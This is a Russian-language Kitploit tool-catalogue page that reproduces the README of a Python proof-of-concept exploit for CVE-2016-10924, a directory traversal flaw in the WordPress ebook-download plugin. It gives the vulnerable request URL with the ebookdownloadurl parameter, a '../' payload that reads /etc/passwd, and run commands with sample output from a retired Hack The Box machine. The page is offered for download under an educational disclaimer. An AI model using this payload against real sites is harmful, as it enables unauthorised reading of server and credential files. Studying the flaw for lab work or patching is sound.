Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2016-10924-POC — Скрипт эксплуатации Proof-of-Concept (PoC) для уязвимости Directory Traversal (CVE-2016-10924), обнаруженной в плагине WordPress ebook-download (версии < 1.2). Эта уязвимость позволяет несанкционированное чтение файлов через специально сформированный GET-запрос. | Kitploit
Инструменты/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Скрипт эксплуатации Proof-of-Concept (PoC) для уязвимости Directory Traversal (CVE-2016-10924), обнаруженной в плагине WordPress ebook-download (версии < 1.2). Эта уязвимость позволяет несанкционированное чтение файлов через специально сформированный GET-запрос.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2016-10924-POC

Этот репозиторий содержит эксплойт-скрипт Proof-of-Concept (PoC) для уязвимости Directory Traversal (CVE-2016-10924), обнаруженной в плагине WordPress ebook-download (версии < 1.2).

Эта уязвимость позволяет несанкционированное чтение файлов через специально сформированный GET-запрос. Эксплойт использует параметр ebookdownloadurl для обхода каталогов на целевом сервере.

Описание

  • CVE-ID: CVE-2016-10924
  • Тип уязвимости: Directory Traversal
  • Затронутый компонент: Плагин ebook-download версии < 1.2 для WordPress
  • Воздействие: Удаленные злоумышленники могут читать произвольные файлы в операционной системе, такие как /etc/passwd, изменяя путь к файлу в параметре ebookdownloadurl.

Примечание: Этот PoC предназначен только для образовательного и авторизованного тестирования. Неправильное использование этой информации может привести к юридическим последствиям.

Требования

  • Python 3.
  • Библиотека requests (установка через pip install requests)

Использование

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Установите зависимости:

    root@kitploit:~
    pip install requests
    
  3. Запустите эксплойт:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Укажите путь к файлу для чтения: После запуска скрипта вам будет предложено ввести путь к файлу. Например:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    Возможно, потребуется изменить количество ../ в зависимости от расположения корневой веб-директории в целевой среде.

  5. Выход:

    • Введите exit, quit или нажмите Enter на пустом поле для выхода.
    • Нажмите Ctrl + C, чтобы немедленно остановить скрипт.

Пример

Я использовал этот эксплойт на машине "Backdoor" из Hack The Box (выведена из эксплуатации):

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Введите пути к файлам (например, ../../../../../etc/passwd). Введите 'exit' для выхода.

Enter File path: ../../../../../../../../../etc/passwd
[*] Целевой URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Код состояния: 200
[+] Содержимое файла:
root:x:0:0:root:/root:/bin/bash
...

Отказ от ответственности

Этот проект предназначен исключительно для образовательных и легитимных тестов безопасности.
Не используйте информацию или скрипты из этого репозитория в системах, на которые у вас нет явного разрешения для тестирования.
Автор и соавторы не несут ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.

Лицензия

Этот проект лицензирован в соответствии с GNU 2.0 License. Можете использовать и изменять его, но, пожалуйста, указывайте авторство.


Ссылки

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (для справки об уязвимых версиях)
Скачать инструмент